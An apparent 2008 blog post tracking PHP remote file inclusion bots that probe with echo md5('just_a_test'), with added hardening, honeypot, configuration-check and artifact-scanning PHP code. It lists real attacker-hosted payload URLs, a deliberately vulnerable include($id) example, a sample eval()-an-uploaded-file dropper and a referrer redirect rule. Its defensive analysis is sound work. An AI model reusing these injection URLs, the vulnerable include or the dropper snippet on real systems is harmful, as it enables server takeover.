Catching and Preventing echo md5(“just_a_test”); exploit attempts

Have been noticing LOTS of automated exploit attempts recently across my small portfolio of PHP sites.

The bots are replacing script.php?id=4 calls with URLs like:

script.php?id=http://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/
and
script.php?id=http://mslayouts.ws/icons/administrator/components/com_menus/aruyi/iyuxuyi/

All these landing pages have:

<?php echo md5("just_a_test");?>

on them. If you have a browse around these obviously hacked sites there is some other interesting code, e.g.:
http://concorduae.com/oldtaifgate/articles/qozevuc/

I'm changing a script which gets hit a few times a day to actually see what the bot will do when it finds the output from the echo md5() statement.
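To make the probe concrete, here is the shape of script the bots are looking for, beside a hardened version. This is an added example, not code from this post or from any of the listed sites: the file layout, the page table and the log call are my assumptions (the post only shows script.php?id=4), and it needs PHP 7.1 or later.

```php
<?php
// Added example, not code from the original post: the shape of script the
// bots are probing for, beside a hardened version. The page table, the file
// layout and the log call are assumptions; the post only shows "script.php?id=4".
// Needs PHP 7.1 or later.

// --- Vulnerable: the ?id= value reaches include() unchanged.
// When PHP is configured to allow URL includes (allow_url_fopen, and from
// PHP 5.2 also allow_url_include), ?id=http://host/path/ makes the server
// fetch and execute the remote file. That is why the probe page holds nothing
// but echo md5("just_a_test"): the bot looks for that hash in the response.
function vulnerable_page(string $id): void
{
    include $id;    // e.g. include 'http://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/';
}

// --- Hardened: the parameter selects from a fixed table of local files and is
// never used as a path. A URL, "../", a null byte or any unknown key simply
// fails the lookup, so include() only ever sees names chosen here.
const PAGES = [
    '1' => 'pages/home.php',
    '2' => 'pages/about.php',
    '4' => 'pages/contact.php',
];

function resolve_page(string $id): ?string
{
    return PAGES[$id] ?? null;
}

// Recognise the probe so the attempt can be logged even though it is harmless
// here: a legitimate page id never starts with a URL scheme.
function looks_like_rfi(string $id): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $id);
}

function hardened_page(string $id): void
{
    $file = resolve_page($id);
    if ($file === null) {
        if (looks_like_rfi($id)) {
            error_log('RFI attempt from ' . ($_SERVER['REMOTE_ADDR'] ?? '?') . ': id=' . $id);
        }
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include __DIR__ . '/' . $file;
}

// hardened_page($_GET['id'] ?? '');
```

The allow-list is the real fix: once the request value is only ever a key into a table you control, it no longer matters whether the PHP build can include URLs at all, and disabling allow_url_fopen becomes defence in depth rather than the only thing standing between the bot and eval().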


UPDATE:

Here’s what happens when the initial just_a_test exploit attempt is successful:

My fake exploitable script was hit 7 times by the robots. Each hit was from a different IP address and used a different compromised host for the initial just_a_test remote file code. Each robot was presented with the output from echo md5("just_a_test");

The robots didn't seem to do anything straight after seeing that the site was exploitable, but 8 hours later I received 60 hits from robots trying to inject a different bit of code:
http://www.municipioxii.it/sunnyway/eheqebi/tigogo/a/ and http://www.cjp.spb.ru/en/tis/geze/a/ and so on.. (all ending in /a/ )

The time lapse between initial attempts and follow up attempts leads me
to believe that the initial robots communicate back to a central server
when they find an exploitable host. More robots are then scheduled to
come back to the exploitable host and try to move to the next level.

This code file they were trying to inject contains a lot of white space with some PHP code in the middle. Here's the formatted PHP code if you want to have a look:

click to view step 2 code

The step 2 PHP code creates a new file with the contents from base64_decode(). The file is called namogofer.php and it tries to create this file in every directory under the document root. When step 2 successfully creates a file on the server it outputs a tab-separated list of information about where the file is located, and continues. The contents of the namogofer.php file which get written to the web server are here:

click to view step 3 code

As you can see, the step 3 code is waiting for a special file upload. The next round of attacks will involve uploading another PHP file to the server in the form of a normal file upload. The code will be dumped in the /tmp directory like all file uploads are, and then the code will be eval()'d.

I’ll update again once I catch the uploaded code.


UPDATE:

I'm seeing about 100 hits a day and growing on this topic. If anybody knows the true nature of this exploit attempt or how so many websites have been compromised, tell me about it and I'll post it here. dtbaker @ gmail. com


UPDATE:

More compromised hosts (2008-02-06):

http://www.heaven-house.kz/templates_c/sexes/afacub/
http://www.felixtorresycia.com/admin/correo/enaq/ecib/
http://sans-packing.ru/img/jipeqap/ehudute/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/
http://www.soeasywebsite.com/soeasycasino/ixu/xotem/
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
http://www.municipioxii.it/sunnyway/eheqebi/jahibop/
http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/
http://www.obrasmecanicasch.com/omch/img/itofu/viroja/



UPDATE:

From Jonathan Dill

Digging through web logs, there has been a surge in this type of activity lately, but it appears to be a run-of-the-mill index.php attempted remote file inclusion exploit; as long as you have PHP configured with allow_url_fopen = 'off' you should be OK. Newer PHP uses a "wrapper" which allows you to restrict what can be included, or you can recode to use cURL instead of url_fopen.

Here are some relevant articles:

http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml

Docs from PHP website:
http://us2.php.net/filesystem

See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html

Recommendations

You should disable allow_url_fopen in the php.ini file:

; Disable allow_url_fopen for security reasons
allow_url_fopen = Off

The setting can also be disabled in apache’s httpd.conf file:

# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off

For remote file access, consider using the cURL functions that PHP provides.
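After changing php.ini or httpd.conf it is worth confirming the setting actually took effect for the SAPI the bots hit (CLI and mod_php often read different ini files). The following is an added self-check, not part of Jonathan's notes or of this post: it reads the two relevant settings and then tries a real include through the data: wrapper, which PHP subjects to the same allow_url_include rule as http://, so the test needs no network. One caveat worth knowing: allow_url_fopen governs fopen()/file_get_contents() on URLs, and since PHP 5.2.0 include/require of a URL is additionally controlled by allow_url_include (default Off); turning either one off stops this attack.

```php
<?php
// Added example (not from the post or from Jonathan Dill's notes): verify that
// this PHP installation cannot include code from a URL. Run it both from the
// CLI and as a one-off page under the web server, since they may use
// different ini files.

function ini_is_on(string $name): bool
{
    $v = strtolower((string) ini_get($name));
    return in_array($v, ['1', 'on', 'yes', 'true'], true);
}

// Functional probe: the data: wrapper is restricted by allow_url_include, so
// this include succeeds only when URL includes are enabled. The included
// "file" just returns a marker string; nothing leaves the machine.
function url_include_enabled(): bool
{
    $code   = '<?php return "included"; ?>';
    $url    = 'data://text/plain;base64,' . base64_encode($code);
    $result = @include $url;          // warning suppressed when the wrapper is disabled
    return $result === 'included';
}

function rfi_config_report(): array
{
    return [
        'allow_url_fopen'   => ini_is_on('allow_url_fopen'),
        'allow_url_include' => ini_is_on('allow_url_include'),   // PHP >= 5.2
        'url_include_works' => url_include_enabled(),
    ];
}

$report = rfi_config_report();
foreach ($report as $name => $on) {
    printf("%-18s %s\n", $name, $on ? 'On' : 'Off');
}
echo $report['url_include_works']
    ? "FAIL: this PHP will include code from a URL\n"
    : "OK: URL includes are blocked\n";
```

The last line is the one that matters: ini_get() tells you what the configuration says, the data: probe tells you what the engine actually does, and the two can disagree when a php_flag in the wrong VirtualHost or an ini_set() in application code overrides the global file.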


UPDATE:

I have made a number of scripts output echo md5("just_a_test"); when they see these automated exploit attempts.
Hopefully I will catch one soon and will be able to see what the next step in the remote file inclusion exploit is.
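The honeypot described above (the script "which gets hit a few times a day" in the first post and the scripts that answer with the md5 in this update) can be a single file required at the top of any page the bots already know about. What follows is my added example of such a honeypot, not the post's own code: the parameter name "id", the log path and the sample log lines are assumptions, and the IP addresses and user agents in the sample are constructed (only the URLs are ones the post lists). It logs each attempt as one tab-separated line, answers with exactly what the bot's probe page would have printed so the follow-up stage shows up, and includes a small summariser for the resulting log.

```php
<?php
// Added example, not the post's own honeypot: require this at the top of a
// script the bots already hit, e.g.  require __DIR__ . '/rfi_honeypot.php';
// Assumptions: the probed parameter is "id" and the log lives outside the
// document root. Needs PHP 7.1 or later.

const HONEYPOT_LOG   = '/var/log/rfi_honeypot.tsv';   // assumed path, web-writable
const HONEYPOT_PARAM = 'id';

function looks_like_rfi(string $value): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $value);
}

// Tabs and newlines are stripped from attacker-controlled fields so a crafted
// value cannot forge extra records in the tab-separated log.
function clean_field(string $s): string
{
    return preg_replace('/[\t\r\n]+/', ' ', $s);
}

function honeypot_log_line(string $ip, string $ua, string $value, int $ts): string
{
    return implode("\t", [date('c', $ts), clean_field($ip), clean_field($ua), clean_field($value)]) . "\n";
}

// What the bot expects to see: the exact output of its probe page.
function honeypot_reply(): string
{
    return md5('just_a_test');
}

// Returns the reply to send (and logs the hit) when the request is a probe,
// or null so the real page can carry on for normal visitors.
function honeypot_check(array $get, array $server): ?string
{
    $value = $get[HONEYPOT_PARAM] ?? '';
    if (!is_string($value) || !looks_like_rfi($value)) {
        return null;
    }
    file_put_contents(HONEYPOT_LOG, honeypot_log_line(
        $server['REMOTE_ADDR'] ?? '-', $server['HTTP_USER_AGENT'] ?? '-', $value, time()
    ), FILE_APPEND | LOCK_EX);
    return honeypot_reply();
}

// Per remote host: how many hits were the just_a_test probe and how many the
// follow-up, whose payload URLs all end in /a/ according to the post.
function summarise_log(string $tsv): array
{
    $out = [];
    foreach (explode("\n", trim($tsv)) as $line) {
        $fields = explode("\t", $line, 4);
        if (count($fields) < 4) {
            continue;
        }
        $url   = $fields[3];
        $host  = parse_url($url, PHP_URL_HOST) ?: '?';
        $stage = substr($url, -3) === '/a/' ? 'stage2' : 'probe';
        $out[$host][$stage] = ($out[$host][$stage] ?? 0) + 1;
    }
    return $out;
}

// Constructed sample log (IPs and user agents are made up) for a CLI dry run.
function sample_log(): string
{
    return implode("\n", [
        "2008-02-05T02:11:09+00:00\t203.0.113.7\tMozilla/4.0\thttp://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/",
        "2008-02-05T02:40:51+00:00\t198.51.100.20\tMozilla/4.0\thttp://mslayouts.ws/icons/administrator/components/com_menus/aruyi/iyuxuyi/",
        "2008-02-05T10:15:33+00:00\t192.0.2.88\tMozilla/4.0\thttp://www.municipioxii.it/sunnyway/eheqebi/tigogo/a/",
    ]) . "\n";
}

if (PHP_SAPI === 'cli') {
    foreach (summarise_log(sample_log()) as $host => $stages) {
        echo str_pad($host, 28), json_encode($stages), "\n";
    }
} else {
    $reply = honeypot_check($_GET, $_SERVER);
    if ($reply !== null) {
        echo $reply;
        exit;
    }
}
```

Run it on the command line to see the summariser over the constructed sample; under the web server it is silent for normal requests and only answers (and logs) when the id parameter carries a URL. Keep the log outside the document root, since the bots' next move after the probe is to look for writable places under it.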


UPDATE:

Mark: some info about WordPress and this exploit: http://news.go41.de/events/php-echo-md5-just_a_test-what-is-that/

Mark: a .htaccess snippet that stops URLs from being passed into any scripts: http://news.go41.de/events/md5-just_a_test-htaccess-solution/
(not sure if this will affect any legit stuff; do any popular WordPress etc. scripts require URLs to be passed as parameters, like referral link counters etc.?)



UPDATE:

I have received quite a few emails from people who have had their servers compromised by this attack.

Seems the overall goal of this attack is to infect .htaccess and JavaScript files with as little impact on normal website functionality as possible. When visitors navigate to the infected site via search engines the user's browsing experience is altered so the attacker can build revenue from PPC vendors.

[snip]

Our server seems to have been exploited by this code.
The payload seemed to be a redirection script that takes any search referrals
from Google, Yahoo, etc and then creates a pseudo blog page promoting some paid
advertising where the blog owner gets a commission on the clicks.

The PPC vendor is (in this instance) PeakClick www.peakclick.com. They don’t appear
to be involved in this.

[/snip]

For those who are digging around: you can find and report straight to the PPC vendors and request that they disable the accounts of the user who is exploiting this attack.

Will post some infected javascript snippets soon.
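For anyone checking whether their own server got past the probe stage, the artifacts described in this post are specific enough to sweep for: the namogofer.php file the step 2 code drops into every directory, PHP files that take an upload and eval() it (step 3), and the .htaccess or JavaScript changes that treat visitors arriving from a search engine differently (the PPC redirect reported above). The following sweep is my added example, not code from the post or from anyone who wrote in; the regexes and the constructed sample tree are my assumptions, and the matches are triage heuristics to read by hand, not proof of compromise (hotlink-protection rules, for instance, also key on HTTP_REFERER).

```php
<?php
// Added example, not code from the post: a read-only sweep of a document root
// for the artifacts described above. The file name namogofer.php, the
// "accept an upload then eval() it" behaviour and the search-engine-referrer
// redirect come from the post; the regexes and the sample tree are my own
// assumptions and are triage heuristics, not proof of compromise.
// Run from the CLI, from a directory outside the document root (the scanner
// itself mentions eval and $_FILES and would otherwise flag itself):
//   php rfi_sweep.php /var/www/html

function classify_file(string $path, string $content): array
{
    $findings = [];
    $name = basename($path);

    // Stage-2 dropper: the same file name written into every directory.
    if ($name === 'namogofer.php') {
        $findings[] = 'known dropper file name';
    }

    // Stage-3 behaviour: take a file upload or raw request body and eval() it.
    if (preg_match('/\.php$/i', $name)
        && preg_match('/\$_FILES|move_uploaded_file|php:\/\/input/', $content)
        && preg_match('/\b(eval|assert)\s*\(/', $content)) {
        $findings[] = 'eval() of uploaded or posted data';
    }

    // Redirect payload: rules that single out visitors arriving from a search engine.
    $searchEngines = '/google|yahoo|msn|altavista/i';
    if ($name === '.htaccess'
        && preg_match('/RewriteCond\s+%\{HTTP_REFERER\}/i', $content)
        && preg_match($searchEngines, $content)) {
        $findings[] = '.htaccess rewrite keyed on a search-engine referrer';
    }
    if (preg_match('/\.(js|php|html?)$/i', $name)
        && preg_match('/document\.referrer|HTTP_REFERER/', $content)
        && preg_match($searchEngines, $content)) {
        $findings[] = 'referrer check against search engines';
    }
    return $findings;
}

function scan_tree(string $root): array
{
    $report = [];
    $files  = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || $file->getSize() > 1048576) {
            continue;                           // skip large binaries (images, archives)
        }
        $path = $file->getPathname();
        $hits = classify_file($path, (string) file_get_contents($path));
        if ($hits) {
            $report[$path] = $hits;
        }
    }
    ksort($report);
    return $report;
}

// Constructed sample tree (two planted artifacts beside a clean index.php) so
// the sweep can be tried without touching a real site.
function build_sample_tree(): string
{
    $root = sys_get_temp_dir() . '/rfi-sweep-' . getmypid();
    mkdir("$root/images", 0700, true);
    file_put_contents("$root/index.php", "<?php include 'pages/home.php';\n");
    file_put_contents("$root/images/namogofer.php",
        '<?php if (isset($_FILES["f"])) eval(file_get_contents($_FILES["f"]["tmp_name"]));');
    file_put_contents("$root/.htaccess",
        "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google|yahoo [NC]\nRewriteRule .* redir.php [L]\n");
    return $root;
}

function remove_tree(string $root): void
{
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach ($it as $f) {
        $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
    }
    rmdir($root);
}

if (PHP_SAPI === 'cli') {
    $root = $argv[1] ?? build_sample_tree();
    foreach (scan_tree($root) as $path => $hits) {
        echo substr($path, strlen($root)), ': ', implode('; ', $hits), "\n";
    }
    if (!isset($argv[1])) {
        remove_tree($root);                     // only the constructed sample tree
    }
}
```

Without an argument it builds the sample tree in the system temp directory, reports the two planted files and removes the tree again; with a path it scans that tree and changes nothing. Whatever it flags, compare the file's modification time with your web logs for the day of the /a/ follow-up hits before deciding it is malicious.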
